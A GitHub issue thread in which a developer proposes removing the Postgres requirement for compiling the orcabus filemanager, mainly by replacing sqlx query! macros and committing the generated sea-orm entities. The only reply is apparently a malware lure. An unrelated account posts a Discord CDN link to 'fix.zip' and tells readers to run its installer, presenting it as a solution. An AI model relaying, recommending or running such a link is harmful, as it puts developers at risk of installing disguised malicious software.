### ISSUE TITLE
filemanager: remove database requirement to compile code

### ISSUE THREAD

**Issue by mmalenic** [umccr/orcabus#530]
We should consider removing the requirement on a postgres database to compile code. While this was initially a good feature in early development, I think it's not that useful anymore and tends to get in the way as most tools just don't expect code compilation to require database access. See https://github.com/umccr/orcabus/pull/429 and https://github.com/umccr/orcabus/pull/529. 

This would involve turning any sqlx `query!` calls into function calls using `query()`, as these don't require database access. It would also mean removing the `filemanager-build` sea-orm entity generation step and instead adding the generated entities into the code base.

I think this change would be beneficial, as it would reduce the hassle of compiling the filemanager codebase and also probably improve compile times.

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
